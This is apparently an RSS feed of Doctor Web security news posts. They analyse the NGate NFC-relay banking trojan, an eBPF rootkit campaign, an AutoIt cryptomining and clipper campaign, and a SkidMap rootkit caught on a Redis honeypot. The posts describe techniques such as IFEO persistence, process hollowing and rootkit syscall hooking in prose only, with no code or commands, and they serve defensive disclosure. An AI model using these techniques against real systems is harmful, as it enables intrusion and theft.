    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/18_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/18_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A “vote counting system” demands a mobile phone number for “confirming the vote” and sending a one-time code&lt;/em&gt;&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/19_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/19_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;When victims enter the received code, they grant the fraudsters access to their Telegram accounts &lt;/em&gt;&lt;/p&gt;

  &lt;div class="CellBlock dangerous_urls_new alignCenter"&gt;
    &lt;a href="https://antifraud.drweb.com/dangerous_urls/?lng=en" target="_blank" rel="noopener noreferrer" class="fontM font2X white textShadow"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
  &lt;/div&gt;  
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Malicious and unwanted programs for mobile devices&lt;/h2&gt;
  &lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q4 2024, users most often encountered &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans and the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.Siggen&lt;/b&gt; malicious apps. At the same time, over the past quarter, Doctor Web’s experts discovered many new threats on Google Play.&lt;/p&gt;
  &lt;p&gt;The following Q4 2024 events involving mobile malware are the most noteworthy:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fraudulent malware,&lt;/li&gt;
    &lt;li&gt;The emergence of new malicious apps on Google Play.&lt;/li&gt;
  &lt;/ul&gt;

  &lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q4 2024, read our &lt;a href="https://news.drweb.com/show/review/?i=14950&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;special overview&lt;/a&gt;.&lt;/p&gt;

&lt;/section&gt;


&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14969&amp;lng=en</guid><title>Contactless banking for thee (and for thief): NFC money theft scheme reaches Russian users</title><link>https://news.drweb.com/show/?i=14969&amp;lng=en&amp;c=9</link><pubDate>Thu, 26 Dec 2024 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;December 26, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Malware analysts at “Doctor Web” warn about the emergence of new versions of the NGate banking trojan, targeting users in Russia. This trojan relays data from the NFC chip of the compromised device, allowing the attacker to withdraw money from the victim's accounts at ATMs without any victim’s involvement.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The NGate banker first appeared on the radar of antivirus vendors in the autumn of 2023, when reports of attacks on customers of major Czech banks began to appear in specialized media. The attackers' strategy involved a combination of social engineering, phishing and the use of malware. When used together, these standard tactics created a rather innovative scenario: after interacting with the victim, the hackers gained remote access to the NFC capabilities of their payment method. Law enforcement in the Czech Republic was able to stop this campaign, but its concept was adapted to the Russian context and used there for illegal enrichment.&lt;/p&gt;

&lt;p&gt;The event that initiates the chain of attack is likely to be a phone call from fraudsters claiming that the victim is eligible for a social benefit or other financial gain. To receive it, the victim must tap on the link, which leads to a fraudulent website, that hosts a malicious APK containing the NGate trojan. The APK is disguised as an application for the Gosuslugi (government services) portal, the Bank of Russia or one of the other popular banks.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/0.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/0.png" alt="danger_apps_icons"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Icons of fake applications, made to look like their official counterparts&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The NGate banking trojan is a malicious modification of the open source NFCGate application, which was developed to debug NFC data transfer protocols. NFCGate supports a number of functions, but of most interest to attackers is the ability to capture NFC traffic and send it to a remote device, which could be either an intermediary server or the attacker's own smartphone. The criminals have modified the source code by adding user interfaces similar to the official applications and enabling the NFC data relay mode. In addition, the application includes the &lt;span class="string"&gt;nfc-card-reader&lt;/span&gt; library, which allows the hackers to remotely obtain the card number and its expiry date.&lt;/p&gt;

&lt;p&gt;After launching the application, the victim is prompted to place their payment card on the back of the smartphone, enter the PIN and wait for the fake application to verify the card. At this point, all the data on the card is read and transferred to the criminals. Note that the compromised smartphone does not need to be rooted to expose its NFC data.&lt;/p&gt;

&lt;div class="margTM margBM flex center"&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/5.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/5.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/1.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/1.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/2.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/2.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/3.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/3.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Screens that ask the victim to place their bank card on the back of their smartphone.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;While the victim holds their card close to their smartphone, the attacker is already at the ATM requesting a cash withdrawal. Another option is to use this scheme for contactless payments. When the ATM asks for the bank card, the hacker simply taps their phone, which will transmit the digital thumbprint of the victim's bank card. The transaction is confirmed using the PIN code the victim previously submitted.&lt;/p&gt;

&lt;p&gt;To prevent money theft, the analysts at “Doctor Web” have the following recommendations:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;do not share your PIN or CVV codes for your bank cards,&lt;/li&gt;
  &lt;li&gt;use an antivirus program, it will block downloading and installation of malicious applications,&lt;/li&gt;
  &lt;li&gt;carefully check the addresses of web pages that ask for financial information,&lt;/li&gt;
  &lt;li&gt;only install applications from official sources such as AppGallery and Google Play,&lt;/li&gt;
  &lt;li&gt;do not talk to scammers. If you receive an unexpected call from the police, a bank or any other organization, simply hang up. If you have any doubts about the legitimacy of the call, find the contact details on the official website and contact the organization yourself.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Android.Banker.NGate.1&amp;lng=en"&gt;&lt;b&gt;Android.Banker.NGate.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Android.Banker.NGate.1" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14955&amp;lng=en</guid><title>Malware trends: eBPF exploitation, malware configurations stored in unexpected places, and increased use of custom post-exploitation tools</title><link>https://news.drweb.com/show/?i=14955&amp;lng=en&amp;c=9</link><pubDate>Tue, 10 Dec 2024 11:09:06 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;December 10, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;An investigation into an information security incident has allowed virus analysts at Doctor Web to uncover an ongoing campaign that incorporates many modern trends employed by cybercriminals.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A client approached Doctor Web after suspecting that their computer infrastructure had been compromised. While analyzing the client’s data, our virus analysts identified a number of similar cases, leading them to conclude that an active campaign was underway. It appears that the hackers' efforts are primarily concentrated in Southeast Asia. During the attacks, they utilize a comprehensive suite of malware that is deployed at various stages. Unfortunately, it was impossible for our analysts to determine how initial access to the compromised machines was obtained. However, they were able to reconstruct the rest of the attack chain. Notably, the threat actors managed to maliciously exploit eBPF (extended Berkeley Packet Filter) technology.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;eBPF technology was developed to enhance control over the network subsystem of the Linux operating system and its processes. It has demonstrated significant potential, attracting the attention of major IT companies: almost from the moment of its inception, giants like Google, Huawei, Intel, and Netflix joined the eBPF Foundation to participate in its further development. Unfortunately, hackers have also taken an interest in eBPF.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;By providing extensive low-level capabilities, eBPF can be used by malicious actors to conceal network activity and processes, gather confidential information, and bypass firewalls and intrusion detection systems. The amount of effort needed to detect such malware allows hackers to use it in APT (advanced persistence threat) attacks and to mask their presence for extended periods.&lt;/p&gt;
&lt;p&gt;These are the capabilities that the attackers decided to exploit by loading two rootkits onto the compromised machine. The first was an eBPF rootkit that concealed the operation of another rootkit, implemented as a kernel module, which in turn prepared the system for the installation of a remote access trojan. A notable feature of the trojan is its support for various traffic-tunneling technologies that allow it to communicate with the attackers from private network segments and conceal the transmission of commands.&lt;/p&gt;
&lt;p&gt;Overall, since 2023, the use of malicious eBPF software has been gaining momentum. This is evidenced by the emergence of several families of malware based on this technology, including Boopkit, BPFDoor, and Symbiote. New vulnerabilities, routinely found in this technology, only exacerbate the situation. As of now, 217 BPF vulnerabilities are known to exist, with about 100 of them discovered in 2024.&lt;/p&gt;
&lt;p&gt;Another notable feature of the campaign is the rather creative approach taken by the threat actors with regards to storing the trojan's settings. Previously, they were likely to use dedicated servers for such purposes, but now instances where the malware configurations are being stored openly on public platforms are increasing. For example, the malware in question accessed platforms like GitHub and even a Chinese blog on information security. This helps draw less attention to the traffic coming from the compromised machine, as to an unsuspecting observer, the machine appears to be interacting with a safe network host. This negates the need to ensure access to a control server where settings are stored. Overall, the idea of leveraging publicly available services as a control infrastructure is not new; hackers are known to have previously used Dropbox, Google Drive, OneDrive, and even Discord for this purpose. However, regional restrictions on these services in several countries, particularly in China, make them less attractive in terms of ensuring availability. Meanwhile, access to GitHub remains available to most providers, making it preferred in the eyes of hackers.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Settings stored on GitLab and in a security blog. Curiously, in the latter case, the hacker asks for help decrypting third-party code. The code will later be sent to the trojan as an argument for one of the commands.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Another feature of this campaign is that the trojan is starting to be adapted for later use as a component for a post-exploitation framework, which is a suite of software used after a computer has been accessed. Such frameworks are not inherently illegal; they are used by companies that officially provide security-audit services. The most popular tools are Cobalt Strike and Metasploit, which allow a large number of checks to be automated and have a built-in vulnerability database.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;An example of a network map created by Cobalt Strike (source: official website)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Of course, such capabilities are highly sought after by threat actors. In 2022, a cracked version of Cobalt Strike became available to a wide audience, leading to a surge in hacker activity. Geographically, the Cobalt Strike infrastructure has a significant presence in China. It is worth noting that the developer aims to track all Cobalt Strike installations, and servers with cracked versions are routinely shut down by law enforcement. Therefore, hackers are steadily trending towards using open-source frameworks that support extensions out of the box and are able to modify the network communication between the infected host and its control server. They prefer this strategy as it does not draw additional attention to their infrastructure.&lt;/p&gt;

&lt;p&gt;As a result of the investigation, our analysts added all identified threats to our malware databases and incorporated additional heuristic rules to ensure that malicious eBPF programs are recognized.&lt;/p&gt;
&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen28.58279&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen28.58279&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Trojan.Siggen28.58279" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=14920&amp;lng=en</guid><title>Hidden cryptocurrency mining and theft campaign affected over 28,000 users</title><link>https://news.drweb.com/show/?i=14920&amp;lng=en&amp;c=9</link><pubDate>Tue, 08 Oct 2024 14:47:30 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 8, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Virus analysts at Doctor Web have identified a large-scale campaign aimed at spreading cryptomining and cryptostealing malware by delivering trojans to victims' computers under the guise of office programs, game cheats, and online trading bots.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;During routine analysis of cloud telemetry submitted by our users, specialists at the Doctor Web virus lab detected suspicious activity of a program disguised as a Windows component (&lt;span class="string"&gt;StartMenuExperienceHost.exe&lt;/span&gt;, a legitimate process with this name is responsible for managing the Start menu). This program communicated with a remote network host and waited for an incoming connection to immediately launch the &lt;span class="string"&gt;cmd.exe&lt;/span&gt; command line interpreter.&lt;/p&gt;
&lt;p&gt;Disguised as a system component was the Ncat network utility, which, when used for legitimate purposes, transfers data over the network via the command line. This discovery helped reconstruct a sequence of security events, including attempts to infect computers with malware, which were prevented by Dr.Web.&lt;/p&gt;
 
&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/1.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/1.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;  
&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/2.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/2.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/3.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/3.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;The source of infection is fraudulent pages created by attackers on GitHub (note that such activity is prohibited by the platform's rules) or Youtube pages containing malware links in the description below the video. By clicking on the link, the victim downloads a self-extracting, password-protected archive. Because the archive is encrypted, it cannot be automatically scanned by antivirus software. After entering the password provided by the hackers on the download page, the following temporary files are extracted to the &lt;span class="string"&gt;%ALLUSERSPROFILE%\jedist&lt;/span&gt; folder on the victim's computer:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;UnRar.exe&lt;/span&gt; - an application for extracting RAR archives;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;WaR.rar&lt;/span&gt; - a RAR archive;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Iun.bat&lt;/span&gt; - a script that creates a task to run the Uun.bat script, then initiates a computer restart, and deletes itself;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Uun.bat&lt;/span&gt; - an obfuscated script that extracts &lt;span class="string"&gt;WaR.rar&lt;/span&gt;, runs the &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; and &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; files it contains, and then deletes the task created by &lt;span class="string"&gt;Iun.bat&lt;/span&gt; and the &lt;span class="string"&gt;jedist&lt;/span&gt; folder along with its contents.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; file is an AutoIt language interpreter and is not malicious in and of itself. However, this is not its true name. Attackers have renamed it from &lt;span class="string"&gt;AutoIt3.exe&lt;/span&gt; to &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; to disguise it as a WinRAR library that is responsible for integrating archiver functionality to the Windows right-click menu. Once launched, the interpreter in turn loads the &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; file, which the cybercriminals borrowed from the Uninstall Tool utility. Perfectly legitimate in its own right, it even carries a valid digital signature, but it has a malicious AutoIt script attached to it. Once executed, the script unpacks its payload, which consists of a series of heavily obfuscated files.&lt;/p&gt;

&lt;blockquote&gt;
  AutoIt is a programming language for creating automation scripts and utilities for Windows. Its ease of use and broad functionality have made it popular with various categories of users, including malware writers. Some antivirus programs detect all compiled AutoIt scripts as malicious.
&lt;/blockquote&gt;

&lt;p&gt;The &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; file performs the following actions:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Scans the process list for running debugging software. The script contains the names of about 50 different debugging utilities, and if at least one process from this list is detected, the script will terminate&lt;/li&gt;
  &lt;li&gt;If no debugging software is found, the files needed to continue the attack are extracted on the compromised system. Some of the files are “clean”, they are necessary to implement network communication, while the rest perform malicious actions&lt;/li&gt;
  &lt;li&gt;Creates system events to gain network access using Ncat and execute BAT and DLL files, and modifies the registry to gain persistence using the IFEO technique
    &lt;blockquote&gt;
      Image File Execution Options (IFEO) is a feature that Windows makes available to software developers. For example, it allows them to automatically launch a debugger when an application starts. However, attackers can use the IFEO technique to gain a foothold in the system. They accomplish this by swapping the path to the debugger with the path to the malicious file, so that every time a legitimate application is launched, the malicious application is started as well. In this case, the hackers "hijacked" Windows system services, as well as the Google Chrome and Microsoft Edge update processes (&lt;span class="string"&gt;MoUsoCoreWorker.exe&lt;/span&gt;, &lt;span class="string"&gt;svchost.exe&lt;/span&gt;, &lt;span class="string"&gt;TrustedInstaller.exe&lt;/span&gt;, &lt;span class="string"&gt;GoogleUpdate.exe&lt;/span&gt; and &lt;span class="string"&gt;MicrosoftEdgeUpdate.exe&lt;/span&gt;).
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Revokes the delete and modify permissions for the folders and files created in step 2.&lt;/li&gt;
  &lt;li&gt;Disables the Windows Recovery Service&lt;/li&gt;
  &lt;li&gt;Sends the specifications of the compromised computer, its name, operating system version and information about the installed antivirus software to the attackers using a Telegram bot.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The &lt;span class="string"&gt;DeviceId.dll&lt;/span&gt; and &lt;span class="string"&gt;7zxa.dll&lt;/span&gt; files perform hidden cryptomining and cryptostealing functions, respectively. Both files inject their payload into the &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Windows Explorer) process using the Process Hollowing technique. The first file is a legitimate library distributed as part of the .NET framework that has a malicious AutoIt script embedded that executes the &lt;a href="https://vms.drweb.com/search/?q=SilentCryptoMiner&amp;lng=en"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt; miner. This miner has extensive configuration and stealth capabilities for cryptocurrency mining, as well as remote control functionality.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;7zxa.dll&lt;/span&gt; library, which again is a legitimate library of the 7-Zip archiver, contains a clipper. This type of malware is used to monitor data in the clipboard, which it can either spoof or pass on to attackers. In this case, the clipper waits for typical strings in the clipboard that are characteristic of wallet addresses and replaces them with those specified by the attackers. At the time of publication, it is confirmed that only thanks to the clipper hackers were able to get hold of more than 6000 dollars worth of cryptocurrency.&lt;/p&gt;

&lt;blockquote&gt;
  The Process Hollowing technique consists of running a trusted process in a suspended state, overwriting its code in memory with malicious code, and then resuming the process execution. The use of this technique results in the presence of copies of the process with the same name, so in our case three &lt;span class="string"&gt;explorer.exe&lt;/span&gt; processes were observed on the victims' machines, which is suspicious in itself as this process normally exists as a single copy.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt; 
 
&lt;p&gt;In total, this malware campaign has affected more than 28,000 people, the vast majority of whom are residents of Russia. Significant numbers of infections have also been observed in Belarus, Uzbekistan, Kazakhstan, Ukraine, Kyrgyzstan and Turkey. Since the victims' computers were compromised by installing pirated versions of popular programs, the main recommendations to prevent such incidents include downloading software from official sources, using their open source replacements, and installing capable antivirus software. Users of Dr.Web products are not affected by this threat.&lt;/p&gt;

&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.1443&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.1443&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Metack/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14918&amp;lng=en</guid><title>Redis honeypot: server with vulnerable Redis database reveals new SkidMap modification used to hide cryptocurrency mining process</title><link>https://news.drweb.com/show/?i=14918&amp;lng=en&amp;c=9</link><pubDate>Thu, 03 Oct 2024 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 3, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web virus analysts have identified a new rootkit modification that installs the Skidmap mining trojan on compromised Linux machines. This rootkit is designed as a malicious kernel module that hides the miner’s activity by providing fake information about CPU usage and network activity. This attack appears to be indiscriminate, primarily targeting the enterprise sector—large servers and cloud environments—where mining efficiency can be maximized.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Redis database management system is the world’s most popular NoSQL database: Redis servers are used by large companies such as X (formerly Twitter), Airbnb, Amazon and others. Its advantages are obvious: maximum performance, tiny memory footprint, and support for various data types and programming languages. However, this product also has some downsides: since Redis was never intended to be used at the network’s edge, it only supports basic security features in its default configuration, and no access control and encryption mechanisms exist prior to version 6. In addition, cybersecurity publications report numerous Redis vulnerabilities each year. In 2023, for example, there were 12 vulnerabilities, three of which had a “Serious” status. The growing number of reports of compromised servers and the subsequent installation of mining programs sparked the interest of Doctor Web's virus lab staff, who wanted to experience the attack firsthand. For this purpose, they decided to set up their own unprotected Redis server and wait for uninvited guests. The server was active for a year, and during that time it was attacked about 10–14 thousand times a month. Recently, the server was hit with a modification of the SkidMap trojan, as our analysts expected. What came as a surprise, however, was that the cybercriminals used a new method to hide the miner's activity and installed four backdoors at the same time.&lt;/p&gt;

&lt;p&gt;The Skidmap trojan first made headlines in 2019. This trojan-miner is specialized and mainly targets enterprise networks since the greatest stealth mining profits can be achieved in the corporate segment. Despite the fact that five years have passed since the trojan’s debut, the principle of its operation remains unchanged: the trojan is installed on a system by exploiting vulnerabilities or through misconfigured software. In the case of our honeypot server, the hackers added tasks to the system scheduler in which a script downloaded the &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.142&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt; dropper (or its other modification, &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.143&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;) every 10 minutes. This executable checks the OS kernel version, disables the SELinux security module, and then unpacks the &lt;a href="https://vms.drweb.com/search/?q=Linux.Rootkit.400&amp;lng=en"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt; rootkit, the &lt;a href="https://vms.drweb.com/search/?q=Linux.BtcMine.815&amp;lng=en"&gt;&lt;b&gt;Linux.BtcMine.815&lt;/b&gt;&lt;/a&gt; miner, and the &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.Pam.8&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.Pam.8&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/9&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.SSH.425&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.SSH.425&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/426&lt;/b&gt; backdoors on the system. The dropper is remarkable in that it is quite large, as it packs about 60 executables for various Linux distributions. In this case, the dropper contained the files for various versions of Debian and Red Hat Enterprise Linux distributions, which are most commonly encountered on servers.&lt;/p&gt;

&lt;p&gt;Once installed, the rootkit intercepts a number of system calls, allowing it to generate fake information in response to diagnostic commands entered by an administrator. Intercepted functions include those that report average CPU usage, network activity on a number of ports, and lists of files in directories. The rootkit also checks all kernel modules when they are loaded and prevents those that can detect its presence from running. All this allows it to thoroughly hide all aspects of the miner's cryptocurrency mining activity: computation, sending hashes, and receiving jobs.&lt;/p&gt;

&lt;p&gt;The purpose of the four backdoors installed by the dropper as part of this attack is to collect SSH credentials from a compromised machine and send them to the attackers and to create a master password for all accounts on the system. Note that all passwords are additionally encrypted using the Caesar cipher with a 4-letter offset.&lt;/p&gt;

&lt;p&gt;To increase their ability to control a compromised system, the attackers install the &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.RCTL.2&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.RCTL.2&lt;/b&gt;&lt;/a&gt; remote access trojan. It allows commands to be sent to the infected machine and data to be exfiltrated via the encrypted connection that the trojan itself initiates, thus bypassing the routing problem.&lt;/p&gt;

&lt;p&gt;The xmrig program is installed as a miner that can mine a number of cryptocurrencies, the most famous of which is Monero, which has gained popularity on the darknet due to its complete anonymity at the transaction level. It should be said that detecting a rootkit-covered miner in a cluster of servers is no trivial task. If the diagnostic data are spoofed, the only thing that might indicate a compromise is excessive power consumption and increased heat generation. However, to somewhat mitigate that, attackers can also tweak the miner's settings to find an optimal balance between mining performance and preserving hardware performance, thus drawing less attention to a compromised system.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;The evolution of the Skidmap malware family can be seen in the increasing complexity of the attack chain: the launched programs call each other, disable security systems, interfere with a large number of system utilities and services, download rootkits, etc., which makes it much more difficult to respond to such incidents.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/skidmap" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.142&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.143&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.144&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.144&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
